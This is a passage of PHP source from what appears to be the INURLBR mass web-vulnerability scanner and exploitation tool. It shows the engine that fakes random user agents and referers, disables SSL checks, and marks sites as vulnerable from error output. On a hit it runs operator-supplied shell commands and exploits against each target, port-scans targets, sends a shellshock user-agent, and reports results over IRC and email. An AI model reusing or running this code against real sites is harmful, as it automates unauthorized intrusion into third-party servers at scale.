  1804. return "http://www." . strtolower($dominio[rand(0, count($dominio) - 1)]) . ".{$gTLD[rand(0, count($gTLD) - 1)]}.{$locais[rand(0, count($locais) - 1)]}/{$pasta[rand(0, count($pasta) - 1)]}/{$arquivo[rand(0, count($arquivo) - 1)]}.{$ext[rand(0, count($ext) - 1)]}";
  1805. }
  1806.  
  1807. ################################################################################
  1808. #GENERATE AGENT BROWSER random##################################################
  1809. ################################################################################
  1810.  
  1811. function __setUserAgentRandom() {
  1812.  
  1813. $agentBrowser = array('Firefox', 'Safari', 'Opera', 'Flock', 'Internet Explorer', 'Seamonkey', 'Tor Browser', 'GNU IceCat', 'CriOS', 'TenFourFox',
  1814. 'SeaMonkey', 'B-l-i-t-z-B-O-T', 'Konqueror', 'Mobile', 'Konqueror', 'Netscape', 'Chrome', 'Dragon', 'SeaMonkey', 'Maxthon', 'IBrowse',
  1815. 'K-Meleon', 'GoogleBot', 'Konqueror', 'Minimo', 'Googlebot', 'WeltweitimnetzBrowser', 'SuperBot', 'TerrawizBot', 'YodaoBot', 'Wyzo', 'Grail',
  1816. 'PycURL', 'Galaxy', 'EnigmaFox', '008', 'ABACHOBot', 'Bimbot', 'Covario IDS', 'iCab', 'KKman', 'Oregano', 'WorldWideWeb', 'Wyzo', 'GNU IceCat',
  1817. 'Vimprobable', 'uzbl', 'Slim Browser', 'Flock', 'OmniWeb', 'Rockmelt', 'Shiira', 'Swift', 'Pale Moon', 'Camino', 'Flock', 'Galeon', 'Sylera'
  1818. );
  1819.  
  1820. $agentSistema = array('Windows 3.1', 'Windows 95', 'Windows 98', 'Windows 2000', 'Windows NT', 'Linux 2.4.22-10mdk', 'FreeBSD',
  1821. 'Windows XP', 'Windows Vista', 'Redhat Linux', 'Ubuntu', 'Fedora', 'AmigaOS', 'BackTrack Linux', 'iPad', 'BlackBerry', 'Unix',
  1822. 'CentOS Linux', 'Debian Linux', 'Macintosh', 'Android', 'iPhone', 'Windows NT 6.1', 'BeOS', 'OS 10.5', 'Nokia', 'Arch Linux',
  1823. 'Ark Linux', 'BitLinux', 'Conectiva (Mandriva)', 'CRUX Linux', 'Damn Small Linux', 'DeLi Linux', 'Ubuntu', 'BigLinux', 'Edubuntu',
  1824. 'Fluxbuntu', 'Freespire', 'GNewSense', 'Gobuntu', 'gOS', 'Mint Linux', 'Kubuntu', 'Xubuntu', 'ZeVenOS', 'Zebuntu', 'DemoLinux',
  1825. 'Dreamlinux', 'DualOS', 'eLearnix', 'Feather Linux', 'Famelix', 'FeniX', 'Gentoo', 'GoboLinux', 'GNUstep', 'Insigne Linux',
  1826. 'Kalango', 'KateOS', 'Knoppix', 'Kurumin', 'Dizinha', 'TupiServer', 'Linspire', 'Litrix', 'Mandrake', 'Mandriva', 'MEPIS',
  1827. 'Musix GNU Linux', 'Musix-BR', 'OneBase Go', 'openSuSE', 'pQui Linux', 'PCLinuxOS', 'Plaszma OS', 'Puppy Linux', 'QiLinux',
  1828. 'Red Hat Linux', 'Red Hat Enterprise Linux', 'CentOS', 'Fedora', 'Resulinux', 'Rxart', 'Sabayon Linux', 'SAM Desktop', 'Satux',
  1829. 'Slackware', 'GoblinX', 'Slax', 'Zenwalk', 'SuSE', 'Caixa Mágica', 'HP-UX', 'IRIX', 'OSF/1', 'OS-9', 'POSYS', 'QNX', 'Solaris',
  1830. 'OpenSolaris', 'SunOS', 'SCO UNIX', 'Tropix', 'EROS', 'Tru64', 'Digital UNIX', 'Ultrix', 'UniCOS', 'UNIflex', 'Microsoft Xenix',
  1831. 'z/OS', 'Xinu', 'Research Unix', 'InfernoOS'
  1832. );
  1833.  
  1834. $locais = array('cs-CZ', 'en-US', 'sk-SK', 'pt-BR', 'sq_AL', 'sq', 'ar_DZ', 'ar_BH', 'ar_EG', 'ar_IQ', 'ar_JO',
  1835. 'ar_KW', 'ar_LB', 'ar_LY', 'ar_MA', 'ar_OM', 'ar_QA', 'ar_SA', 'ar_SD', 'ar_SY', 'ar_TN', 'ar_AE', 'ar_YE', 'ar',
  1836. 'be_BY', 'be', 'bg_BG', 'bg', 'ca_ES', 'ca', 'zh_CN', 'zh_HK', 'zh_SG', 'zh_TW', 'zh', 'hr_HR', 'hr', 'cs_CZ', 'cs',
  1837. 'da_DK', 'da', 'nl_BE', 'nl_NL', 'nl', 'en_AU', 'en_CA', 'en_IN', 'en_IE', 'en_MT', 'en_NZ', 'en_PH', 'en_SG', 'en_ZA',
  1838. 'en_GB', 'en_US', 'en', 'et_EE', 'et', 'fi_FI', 'fi', 'fr_BE', 'fr_CA', 'fr_FR', 'fr_LU', 'fr_CH', 'fr', 'de_AT', 'de_DE',
  1839. 'de_LU', 'de_CH', 'de', 'el_CY', 'el_GR', 'el', 'iw_IL', 'iw', 'hi_IN', 'hu_HU', 'hu', 'is_IS', 'is', 'in_ID', 'in', 'ga_IE',
  1840. 'ga', 'it_IT', 'it_CH', 'it', 'ja_JP', 'ja_JP_JP', 'ja', 'ko_KR', 'ko', 'lv_LV', 'lv', 'lt_LT', 'lt', 'mk_MK', 'mk', 'ms_MY',
  1841. 'ms', 'mt_MT', 'mt', 'no_NO', 'no_NO_NY', 'no', 'pl_PL', 'pl', 'pt_PT', 'pt', 'ro_RO', 'ro', 'ru_RU', 'ru', 'sr_BA', 'sr_ME',
  1842. 'sr_CS', 'sr_RS', 'sr', 'sk_SK', 'sk', 'sl_SI', 'sl', 'es_AR', 'es_BO', 'es_CL', 'es_CO', 'es_CR', 'es_DO', 'es_EC', 'es_SV',
  1843. 'es_GT', 'es_HN', 'es_MX', 'es_NI', 'es_PA', 'es_PY', 'es_PE', 'es_PR', 'es_ES', 'es_US', 'es_UY', 'es_VE', 'es', 'sv_SE',
  1844. 'sv', 'th_TH', 'th_TH_TH', 'th', 'tr_TR', 'tr', 'uk_UA', 'uk', 'vi_VN', 'vi'
  1845. );
  1846. return $agentBrowser[rand(0, count($agentBrowser) - 1)] . '/' . rand(1, 20) . '.' . rand(0, 20) . ' (' . $agentSistema[rand(0, count($agentSistema) - 1)] . ' ' . rand(1, 7) . '.' . rand(0, 9) . '; ' . $locais[rand(0, count($locais) - 1)] . ';)';
  1847. }
  1848.  
  1849. ################################################################################
  1850. #RESPONSIBLE FOR RUN COMMANDS IN TERMINAL the installation of facilities########
  1851. ################################################################################
  1852.  
  1853. function __installDepencia() {
  1854.  
  1855. echo __bannerlogo() . __plus();
  1856. echo "\n{$_SESSION["c15"]}|_[ * ]__{$_SESSION["c0"]}\n";
  1857. echo " {$_SESSION["c15"]}|[EXTERNAL COMMAND INSTALLING PREMISES ]:: {$_SESSION["c11"]}\n";
  1858. $dados = system("sudo apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl", $dados) . __plus();
  1859. sleep(1) . __plus();
  1860. echo "{$_SESSION["c0"]}";
  1861. if (empty($dados)) {
  1862.  
  1863. return FALSE;
  1864. }
  1865. unset($dados);
  1866. exit();
  1867. }
  1868.  
  1869. ################################################################################
  1870. #RESPONSIBLE FOR RUN COMMANDS IN TERMINAL#######################################
  1871. ################################################################################
  1872.  
  1873. function __command($commando, $alvo) {
  1874.  
  1875. if (!is_null($commando)) {
  1876.  
  1877. (strstr($commando, '_TARGET_') ||
  1878. strstr($commando, '_TARGETFULL_') ||
  1879. strstr($commando, '_TARGETIP_') ||
  1880. strstr($commando, '_EXPLOIT_') ||
  1881. strstr($commando, '_URI_') ||
  1882. strstr($commando, '_URI_') ||
  1883. strstr($commando, '_PORT_') ||
  1884. strstr($commando, '_RANDOM_') ? NULL :
  1885. __getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c2"]}SET PARAMETER - command correctly{$_SESSION["c0"]}\n"));
  1886.  
  1887. $uri = parse_url($alvo['url_xpl']);
  1888.  
  1889. $command[0] = str_replace("_TARGET_", "{$_SESSION["c8"]}" . __filterHostname($alvo['url_xpl']) . "{$_SESSION["c1"]}", $commando);
  1890. $command[0] = str_replace('_TARGETIP_', "{$_SESSION["c9"]}{$_SESSION['config']['server_ip']}{$_SESSION["c1"]}", $command[0]);
  1891. $command[0] = str_replace('_TARGETFULL_', "{$_SESSION["c14"]}{$alvo['url_clean']}{$_SESSION["c1"]}", $command[0]);
  1892. $command[0] = str_replace('_TARGETXPL_', "{$_SESSION["c14"]}{$alvo['url_xpl']}{$_SESSION["c1"]}", $command[0]);
  1893. $command[0] = str_replace("_EXPLOIT_", "{$_SESSION["c6"]}{$_SESSION['config']['exploit-command']}{$_SESSION["c1"]}", $command[0]);
  1894. $command[0] = str_replace('_URI_', "{$_SESSION["c8"]}{$uri['path']}{$_SESSION["c1"]}", $command[0]);
  1895. $command[0] = str_replace('_PORT_', "{$_SESSION["c9"]}{$alvo['url_port']}{$_SESSION["c1"]}", $command[0]);
  1896. $command[0] = str_replace('_RANDOM_', "{$_SESSION["c15"]}" . random(5) . "{$_SESSION["c1"]}", $command[0]);
  1897.  
  1898. $command[0] = __crypt($command[0]);
  1899.  
  1900. $command[1] = str_replace("_TARGET_", __filterHostname($alvo['url_clean']), $commando);
  1901. $command[1] = str_replace('_TARGETIP_', $_SESSION['config']['server_ip'], $command[1]);
  1902. $command[1] = str_replace('_TARGETFULL_', $alvo['url_clean'], $command[1]);
  1903. $command[1] = str_replace('_TARGETXPL_', $alvo['url_xpl'], $command[1]);
  1904. $command[1] = str_replace("_EXPLOIT_", $_SESSION['config']['exploit-command'], $command[1]);
  1905. $command[1] = str_replace("_URI_", $uri['path'], $command[1]);
  1906. $command[1] = str_replace("_PORT_", $alvo['url_port'], $command[1]);
  1907. $command[1] = str_replace("_RANDOM_", random(5), $command[1]);
  1908. $command[1] = str_replace("\n", '', str_replace("\r", '', $command[1]));
  1909.  
  1910. $command[1] = __crypt($command[1]);
  1911.  
  1912. echo "\n{$_SESSION["c1"]}|_[ * ]__\n";
  1913. echo " |[ EXTERNAL COMMAND ]:: {$command[0]}{$_SESSION["c11"]}\n";
  1914. $_ = array(0 => ($_SESSION['config']['popup']) ? 'sudo xterm -geometry 134x50+1900+0 -title "Auxiliary Window - INURLBR / COMMAND" -e ' : NULL, 1 => ($_SESSION['config']['popup']) ? ' > /dev/null &' : NULL);
  1915. echo ($_SESSION['config']['popup'] ? "\t[!] opening auxiliary window...\n" : NULL);
  1916. $dados = system($_[0] . $command[1] . $_[1], $dados);
  1917. sleep(1) . __plus();
  1918.  
  1919. echo $_SESSION["c0"];
  1920. }
  1921. if (empty($dados[0])) {
  1922.  
  1923. return FALSE;
  1924. }
  1925. unset($dados);
  1926. }
  1927.  
  1928. ################################################################################
  1929. #FILTER BY TAKING ONLY RESPONSIBLE URL HOSTNAME#################################
  1930. ################################################################################
  1931.  
  1932. function __filterHostname($url) {
  1933.  
  1934. $alvo_ = NULL;
  1935. //#\b((((ht|f)tps?://*)|(www|ftp)\.)[a-zA-Z0-9-\.]+)#i - 1.0
  1936. preg_match_all('@^(?:(ht|f)tps?://*)?([^/]+)@i', $url, $alvo_);
  1937. return str_replace("/", '', str_replace("ftps:", '', str_replace("ftp:", '', str_replace("https:", '', str_replace("http:", '', $alvo_[0][0])))));
  1938. }
  1939.  
  1940. ################################################################################
  1941. #RESPONSIBLE FOR ALL REQUESTS GET / POST THE SCRIPT#############################
  1942. ################################################################################
  1943. /*
  1944. curl_multi_init — Returns a new cURL multi handle
  1945. (PHP 5) http://php.net/manual/en/function.curl-multi-init.php
  1946. */
  1947.  
  1948. function __request_info($url_, $proxy = NULL, $postDados = NULL) {
  1949.  
  1950. $url_ = __crypt($url_);
  1951. $mh = curl_multi_init();
  1952. $curl_array = array();
  1953. $nodes = is_array($url_) ? $url_ : array($url_);
  1954.  
  1955. foreach ($nodes as $i => $url) {
  1956.  
  1957. $curl_array[$i] = curl_init($url);
  1958.  
  1959. __plus();
  1960.  
  1961. //FORMATANDO POST & EXECUTANDO urlencode EM CADA VALOR DO POST.
  1962. if (not_isnull_empty($postDados) && is_array($postDados)) {
  1963.  
  1964. foreach ($postDados as $campo => $valor) {
  1965.  
  1966. $postDados_format .= "{$campo}=" . urlencode($valor) . '&';
  1967. }
  1968.  
  1969. $postDados_format = rtrim($postDados_format, '&');
  1970. curl_setopt($curl_array[$i], CURLOPT_POST, count($postDados));
  1971. curl_setopt($curl_array[$i], CURLOPT_POSTFIELDS, __crypt($postDados_format));
  1972. }
  1973.  
  1974. curl_setopt($curl_array[$i], CURLOPT_HTTPHEADER, array_merge(not_isnull_empty($_SESSION['config']['http-header']) ?
  1975. explode(',', __crypt($_SESSION['config']['http-header'])) : array(), array("Cookie: disclaimer_accepted=true")));
  1976. curl_setopt($curl_array[$i], CURLOPT_USERAGENT, (not_isnull_empty($_SESSION['config']['user-agent'])) ?
  1977. __crypt($_SESSION['config']['user-agent']) : __setUserAgentRandom());
  1978. curl_setopt($curl_array[$i], CURLOPT_REFERER, (not_isnull_empty($_SESSION['config']['url-reference'])) ?
  1979. __crypt($_SESSION['config']['url-reference']) : __setURLReferenceRandom());
  1980.  
  1981. (!is_null($proxy) ? curl_setopt($curl_array[$i], CURLOPT_PROXY, $proxy) : NULL);
  1982. (!is_null($_SESSION['config']['verifica_info'])) ? curl_setopt($curl_array[$i], CURLOPT_HEADER, 1) : NULL;
  1983. (!is_null($_SESSION['config']['verifica_info']) && __validateOptions('3,6', $_SESSION['config']['debug']) ?
  1984. curl_setopt($curl_array[$i], CURLOPT_VERBOSE, 1) : NULL);
  1985.  
  1986. __plus();
  1987. curl_setopt($curl_array[$i], CURLOPT_SSL_VERIFYPEER, 0);
  1988. curl_setopt($curl_array[$i], CURLOPT_SSL_VERIFYHOST, 0);
  1989. curl_setopt($curl_array[$i], CURLOPT_FRESH_CONNECT, 1);
  1990. curl_setopt($curl_array[$i], CURLOPT_RETURNTRANSFER, 1);
  1991.  
  1992. curl_setopt($curl_array[$i], CURLOPT_CONNECTTIMEOUT, not_isnull_empty($_SESSION['config']['time-out']) ?
  1993. $_SESSION['config']['time-out'] : 5);
  1994.  
  1995. curl_setopt($curl_array[$i], CURLOPT_TIMEOUT, not_isnull_empty($_SESSION['config']['time-out']) ?
  1996. $_SESSION['config']['time-out'] : 5);
  1997.  
  1998. curl_setopt($curl_array[$i], CURLOPT_COOKIEFILE, not_isnull_empty($_SESSION['config']['file-cookie']) ?
  1999. $_SESSION['config']['file-cookie'] : 'cookie.txt');
  2000.  
  2001. curl_setopt($curl_array[$i], CURLOPT_COOKIEJAR, not_isnull_empty($_SESSION['config']['file-cookie']) ?
  2002. $_SESSION['config']['file-cookie'] : 'cookie.txt');
  2003.  
  2004. curl_multi_add_handle($mh, $curl_array[$i]);
  2005. }
  2006. $running = NULL;
  2007. do {
  2008.  
  2009. usleep(100);
  2010. curl_multi_exec($mh, $running);
  2011. } while ($running > 0);
  2012. $ret = array();
  2013. foreach ($nodes as $i => $url) {
  2014.  
  2015. $ret[0] = curl_multi_getcontent($curl_array[$i]);
  2016. $ret[1] = curl_getinfo($curl_array[$i]);
  2017. $ret[2] = curl_error($curl_array[$i]);
  2018. }
  2019. foreach ($nodes as $i => $url) {
  2020. curl_multi_remove_handle($mh, $curl_array[$i]);
  2021. }
  2022.  
  2023. $status = NULL;
  2024. preg_match_all('(HTTP.*)', $ret[0], $status['http']);
  2025. preg_match_all('(Server:.*)', $ret[0], $status['server']);
  2026. preg_match_all('(X-Powered-By:.*)', $ret[0], $status['X-Powered-By']);
  2027.  
  2028. __plus();
  2029. $ret[3] = str_replace("\r", '', str_replace("\n", '', "{$status['http'][0][0]}, {$status['server'][0][0]} {$status['X-Powered-By'][0][0]}"));
  2030. __debug(array('debug' => "[ BODY ]{$ret[0]}", 'function' => '__request_info'), 4);
  2031.  
  2032. __plus();
  2033. __debug(array('debug' => "[ URL ]{$url_}", 'function' => '__request_info'), 2);
  2034.  
  2035. __plus();
  2036. curl_multi_close($mh) . unlink('cookie.txt');
  2037.  
  2038. __plus();
  2039. unset($curl_array);
  2040. return isset($ret[0]) ? array('corpo' => $ret[0], 'server' => $ret[1], 'error' => $ret[2], 'info' => $ret[3]) : FALSE;
  2041. }
  2042.  
  2043. ################################################################################
  2044. #CAPTURE INFORMATION SERVER AND VALIDATE FAULTS#################################
  2045. ################################################################################
  2046.  
  2047. function __infoServer($url_, $postDados = NULL) {
  2048.  
  2049. __plus();
  2050. $_SESSION['config']['verifica_info'] = 1;
  2051. $resultado = __request_info($url_, $_SESSION["config"]["proxy"], $postDados);
  2052. __plus();
  2053. if (isset($resultado['corpo'])) {
  2054. if (!is_null($_SESSION['config']['extrai-email'])) {
  2055.  
  2056. __plus();
  2057. return __extractEmail($resultado['corpo'], $url_);
  2058. }
  2059.  
  2060. if (!is_null($_SESSION['config']['extrai-url'])) {
  2061.  
  2062. __plus();
  2063. return __extractURLs($resultado['corpo'], $url_);
  2064. }
  2065.  
  2066. if (not_isnull_empty($_SESSION['config']['regexp-filter'])) {
  2067.  
  2068. __plus();
  2069. return __extractRegCustom($resultado['corpo'], $url_);
  2070. }
  2071.  
  2072. if (not_isnull_empty($_SESSION['config']['target']) && $_SESSION['config']['tipoerro'] == 5) {
  2073.  
  2074. __plus();
  2075. return __checkURLs($resultado, $url_);
  2076. }
  2077.  
  2078. $ifcode = not_isnull_empty($_SESSION['config']['ifcode']) &&
  2079. strstr($resultado['server']['http_code'], $_SESSION['config']['ifcode']) ?
  2080. "CODE_HTTP_FOUND: {$_SESSION['config']['ifcode']} / " : NULL;
  2081.  
  2082.  
  2083. $ifredirect = not_isnull_empty($_SESSION['config']['ifredirect']) &&
  2084. (strstr($resultado['server']['redirect_url'], $_SESSION['config']['ifredirect'])) ?
  2085. 'VALUE URL REDIRECT FOUND' : NULL;
  2086.  
  2087. $_SESSION['config']['erroReturn'] = $ifredirect . $ifcode . __checkError($resultado['corpo']);
  2088. __plus();
  2089. $_SESSION['config']['curl_getinfo'] = $resultado['server'];
  2090. $_SESSION['config']['error_conection'] = (not_isnull_empty($resultado['error']) ? $resultado['error'] : NULL);
  2091. $_SESSION['config']['server_ip'] = (!is_null($resultado['server']['primary_ip']) ? $resultado['server']['primary_ip'] : NULL);
  2092. $_SESSION['config']['vull_style'] = (not_isnull_empty($_SESSION['config']['erroReturn'])) ?
  2093. "{$_SESSION["c4"]}( POTENTIALLY VULNERABLE ){$_SESSION["c0"]} \033[1m \033[32m" . __cli_beep() : NULL;
  2094. $_SESSION['config']['resultado_valores'].=(not_isnull_empty($_SESSION['config']['erroReturn'])) ? "{$url_}\n" : NULL;
  2095. __plus();
  2096. $url_ = ($_SESSION['config']['alexa-rank']) ? ", RANK ALEXA: " . __positionAlexa($url_) : NULL;
  2097. __plus();
  2098. $_SESSION['config']['info_ip'] = __infoIP($resultado['server']['primary_ip'], 1);
  2099. __plus();
  2100. } else {
  2101. return FALSE;
  2102. }
  2103. __plus();
  2104.  
  2105. return "{$resultado['info']}, IP:{$resultado['server']['primary_ip']}:{$resultado['server']['primary_port']} {$url_}";
  2106. }
  2107.  
  2108. ################################################################################
  2109. #ERROR MAIN PROCESS RESPONSIBLE FOR ALL VALIDATION OF MOTOR#####################
  2110. ################################################################################
  2111.  
  2112. function __processUrlExec($url, $contUrl) {
  2113.  
  2114. __plus();
  2115. if (is_null($url) || empty($url)) {
  2116.  
  2117. return FALSE;
  2118. }
  2119.  
  2120. $host = (!is_null($_SESSION['config']['replace'])) ?
  2121. __replace($_SESSION['config']['replace'], urldecode($_SESSION['config']['tipoerro'] == 3 ? __filterHostname($url) : ($url))) :
  2122. urldecode($_SESSION['config']['tipoerro'] == 3 ? __filterHostname($url) : ($url));
  2123.  
  2124. $target_['url_xpl'] = __remove($_SESSION['config']['remove'], __mountURLExploit(!is_null($_SESSION['config']['url']) ? $_SESSION['config']['url'] . $host : $host));
  2125. $info = __infoServer($target_['url_xpl'], $_SESSION['config']['exploit-post']);
  2126. $target_['url_clean'] = ($_SESSION['config']['tipoerro'] == 4) ? $_SESSION['config']['url'] . $host : urldecode($url);
  2127.  
  2128. __plus();
  2129.  
  2130. if ($_SESSION['config']['tipoerro'] != 5 && is_null($_SESSION['config']['extrai-email']) &&
  2131. is_null($_SESSION['config']['extrai-url']) && is_null($_SESSION['config']['regexp-filter'])) {
  2132.  
  2133. $ifredirect = strstr($_SESSION['config']['curl_getinfo']['redirect_url'], $_SESSION['config']['ifredirect']) ?
  2134. "{$_SESSION["c4"]}{$_SESSION['config']['curl_getinfo']['redirect_url']}" : NULL;
  2135. $exget = (not_isnull_empty($_SESSION['config']['exploit-get']) ? ' _/GET=> ' . $_SESSION['config']['exploit-get'] : NULL);
  2136. $expost = (not_isnull_empty($_SESSION['config']['exploit-post']) ? ' _/POST=> ' . $_SESSION['config']['exploit-post_str'] : NULL);
  2137. $valid_return = (not_isnull_empty($_SESSION['config']['erroReturn'])) ? TRUE : FALSE;
  2138. $info = ($valid_return) ? "{$_SESSION["c4"]}{$info}" : $info;
  2139. $target_ip = ($valid_return) ? "{$_SESSION["c4"]}{$_SESSION['config']['info_ip']}" : $_SESSION['config']['info_ip'];
  2140.  
  2141. $anime = ($valid_return) ? '[ ! ]' : '[ - ]';
  2142. echo __plus() . "\n";
  2143.  
  2144. echo "{$_SESSION["c1"]}{$_SESSION['config']['line']}{$_SESSION["c0"]}\n";
  2145. echo "{$_SESSION["c1"]}|_[ + ] [{$_SESSION["c1"]} {$contUrl} / {$_SESSION['config']['total_url']} {$_SESSION["c1"]}]{$_SESSION["c9"]}-[" . date("H:i:s") . "]{$_SESSION["c1"]} {$anime} {$_SESSION["c0"]}\n";
  2146. echo "{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}Target:: {$_SESSION["c1"]}[{$_SESSION["c9"]} {$_SESSION['config']['vull_style']}{$target_['url_clean']}{$_SESSION["c1"]} ]{$_SESSION["c0"]}\n";
  2147. echo "{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}Exploit:: {$_SESSION["c0"]}{$_SESSION["c3"]}{$exget}{$expost}{$_SESSION["c0"]}\n";
  2148. echo (not_isnull_empty($_SESSION['config']['replace'])) ? ("{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}Replace:: {$_SESSION["c0"]}{$_SESSION["c3"]}{$_SESSION['config']['replace']}{$_SESSION["c0"]}\n") : NULL;
  2149. echo (not_isnull_empty($_SESSION['config']['remove'])) ? ("{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}Remove:: {$_SESSION["c0"]}{$_SESSION["c3"]}{$_SESSION['config']['remove']}{$_SESSION["c0"]}\n") : NULL;
  2150. echo (isset($_SESSION['config']['cms-check-resultado'])) ? ("{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}CMS check:: {$_SESSION["c0"]}{$_SESSION["c3"]}{$_SESSION['config']['cms-check-resultado']}{$_SESSION["c0"]}\n") : NULL;
  2151. echo "{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}Information Server:: {$_SESSION["c0"]}{$_SESSION["c9"]}{$info}{$_SESSION["c1"]}\n";
  2152. echo "{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}More details:: {$_SESSION["c0"]}{$_SESSION["c9"]}{$target_ip}{$_SESSION["c1"]}\n";
  2153. echo "{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}Found:: {$_SESSION["c9"]}" . ($valid_return ? "{$_SESSION["c4"]}{$_SESSION['config']['erroReturn']}" : "UNIDENTIFIED") . "{$_SESSION["c0"]}";
  2154. echo (not_isnull_empty($ifredirect) ? "\n{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}URL REDIRECT:: {$_SESSION["c9"]}{$ifredirect}{$_SESSION["c0"]}" : NULL);
  2155. echo (not_isnull_empty($_SESSION['config']['error_conection']) ? "\n{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}ERROR CONECTION:: {$_SESSION["c2"]}{$_SESSION['config']['error_conection']}{$_SESSION["c0"]}" : NULL);
  2156. ($valid_return ? __saveValue($_SESSION['config']['arquivo_output'], $target_['url_xpl'], 1) : NULL);
  2157. echo ($_SESSION['config']['sendmail'] ? "\n{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}SEND MAIL:: {$_SESSION["c9"]}" . (($valid_return) ? "{$_SESSION["c4"]}" : NULL) . __sendMail($_SESSION['config']['sendmail'], $target_['url_xpl']) . "{$_SESSION["c0"]}" : NULL);
  2158. (not_isnull_empty($_SESSION['config']['arquivo_output_all']) ? __saveValue($_SESSION['config']['arquivo_output_all'], $target_['url_xpl'], NULL) : NULL);
  2159. __plus();
  2160.  
  2161. if ($valid_return) {
  2162.  
  2163. (not_isnull_empty($_SESSION['config']['irc']['irc_connection']) ?
  2164. __ircMsg($_SESSION['config']['irc'], "{$_SESSION['config']['erroReturn']}::: {$target_['url_xpl']}") : NULL);
  2165. __plus();
  2166.  
  2167. (not_isnull_empty($_SESSION['config']['command-vul']) ? __command($_SESSION['config']['command-vul'], $target_) : NULL);
  2168. __plus();
  2169.  
  2170. (not_isnull_empty($_SESSION['config']['exploit-vul-id']) ?
  2171. __configExploitsExec($_SESSION['config']['exploit-vul-id'], $target_) : NULL);
  2172. __plus();
  2173. }
  2174.  
  2175. (not_isnull_empty($_SESSION['config']['command-all']) ? __command($_SESSION['config']['command-all'], $target_) : NULL);
  2176. __plus();
  2177.  
  2178. (not_isnull_empty($_SESSION['config']['sub-file']) &&
  2179. is_array($_SESSION['config']['sub-file']) ? __subExecExploits($target_['url_xpl'], $_SESSION['config']['sub-file']) : NULL);
  2180. __plus();
  2181.  
  2182. (not_isnull_empty($_SESSION['config']['exploit-all-id']) ? __configExploitsExec($_SESSION['config']['exploit-all-id'], $target_) : NULL);
  2183. __plus();
  2184.  
  2185. ($_SESSION['config']['robots'] ? __getValuesRobots($host) : NULL);
  2186. __plus();
  2187.  
  2188. (not_isnull_empty($_SESSION['config']['port-scan']) ? __portScan(array(0 => $target_, 1 => $_SESSION['config']['port-scan'])) : NULL);
  2189. __plus();
  2190.  
  2191. __timeSec('delay', "\n");
  2192. }
  2193. }
  2194.  
  2195. ################################################################################
  2196. #PRINT MESSAGE AND OUT OF THE PROCESS###########################################
  2197. ################################################################################
  2198.  
  2199. function __getOut($msg) {
  2200. __ircQuit($_SESSION['config']['irc']);
  2201. print_r($msg);
  2202. exit(1);
  2203. }
  2204.  
  2205. ################################################################################
  2206. #ERROR MAIN PROCESS RESPONSIBLE FOR ALL VALIDATION OF ENGINE####################
  2207. ################################################################################
  2208.  
  2209. function __process($resultadoURL) {
  2210.  
  2211. __plus();
  2212. $resultadoURL[0] = (is_array($resultadoURL) ? array_unique(array_filter($resultadoURL)) : $resultadoURL);
  2213. $resultadoURL[0] = ($_SESSION['config']['unique'] ? __filterDomainUnique($resultadoURL[0]) : $resultadoURL[0]);
  2214.  
  2215. $resultadoURL[0] = (not_isnull_empty($_SESSION['config']['ifurl']) ? __filterURLif($resultadoURL[0]) : $resultadoURL[0]);
  2216. $_SESSION['config']['total_url'] = count($resultadoURL[0]);
  2217.  
  2218. echo "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c12"]}[ TOTAL FOUND VALUES ]::{$_SESSION["c1"]} [ {$_SESSION['config']['total_url']} ]{$_SESSION["c0"]}\n";
  2219. __debug(array('debug' => $resultadoURL[0], 'function' => '__process'), 3);
  2220.  
  2221. if (count($resultadoURL[0]) > 0) {
  2222.  
  2223. $_SESSION['config']['irc']['irc_connection'] = (not_isnull_empty($_SESSION['config']['irc']['conf']) ? __ircConect($_SESSION['config']['irc']) : NULL);
  2224. $_SESSION['config']['irc']['my_fork'] = pcntl_fork();
  2225.  
  2226. if ($_SESSION['config']['irc']['my_fork'] == 0) {
  2227.  
  2228. (not_isnull_empty($_SESSION['config']['irc']['irc_connection']) ? __ircPong($_SESSION['config']['irc']) : NULL);
  2229. exit(0);
  2230. } else if ($_SESSION['config']['irc']['my_fork'] == -1) {
  2231.  
  2232. __getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c2"]}ERROR Fork failed{$_SESSION["c0"]}\n");
  2233. }
  2234.  
  2235. $_SESSION['config']['user-agent'] = ($_SESSION['config']['shellshock']) ? $_SESSION['config']['user_agent_xpl'] : $_SESSION['config']['user-agent'];
  2236. foreach ($resultadoURL[0] as $url) {
  2237.  
  2238. __plus();
  2239. $url = urldecode(not_isnull_empty($_SESSION['config']['target']) ?
  2240. $_SESSION['config']['target'] . $url : $url);
  2241.  
  2242. if (__validateURL($url) || not_isnull_empty($_SESSION['config']['abrir-arquivo'])) {
  2243.  
  2244. __processUrlExec(__filterURLTAG($url), $_SESSION["config"]["contUrl"] ++);
  2245. __plus();
  2246. }
  2247. }
  2248. } else {
  2249.  
  2250. print_r("{$_SESSION["c1"]}[ INFO ]{$_SESSION["c2"]} Not a satisfactory result was found!{$_SESSION["c0"]}\n");
  2251. }
  2252. }
  2253.  
  2254. ################################################################################
  2255. #ERRORS STANDARDS OF SCRIPT VALIDATE WITH HTML RECEIVED#########################
  2256. ################################################################################
  2257.  
  2258. function __checkError($html_) {
  2259.  
  2260.  
  2261. if (__validateOptions($_SESSION['config']['tipoerro'], '2')) {
  2262.  
  2263. $validation['ERROR-CUSTOM'] = not_isnull_empty($_SESSION['config']['achar']) ? $_SESSION['config']['achar'] : NULL;
  2264. }
  2265.  
  2266. if (__validateOptions('1,3,4', $_SESSION['config']['tipoerro'])) {
  2267.  
